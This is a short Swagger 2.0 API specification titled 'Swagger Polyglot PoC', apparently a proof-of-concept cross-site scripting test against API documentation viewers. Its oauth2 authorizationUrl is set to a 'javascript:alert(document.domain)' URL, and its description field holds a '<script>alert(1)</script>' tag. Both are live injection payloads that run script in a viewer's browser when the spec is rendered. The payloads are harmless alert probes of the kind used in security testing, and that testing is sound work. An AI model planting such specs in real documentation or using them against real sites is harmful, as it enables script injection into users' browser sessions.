swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Swagger Polyglot PoC
  description: <script>alert(1)</script>
paths:
  "/a":
    get:
      responses:
        200:
          description: Successful respons
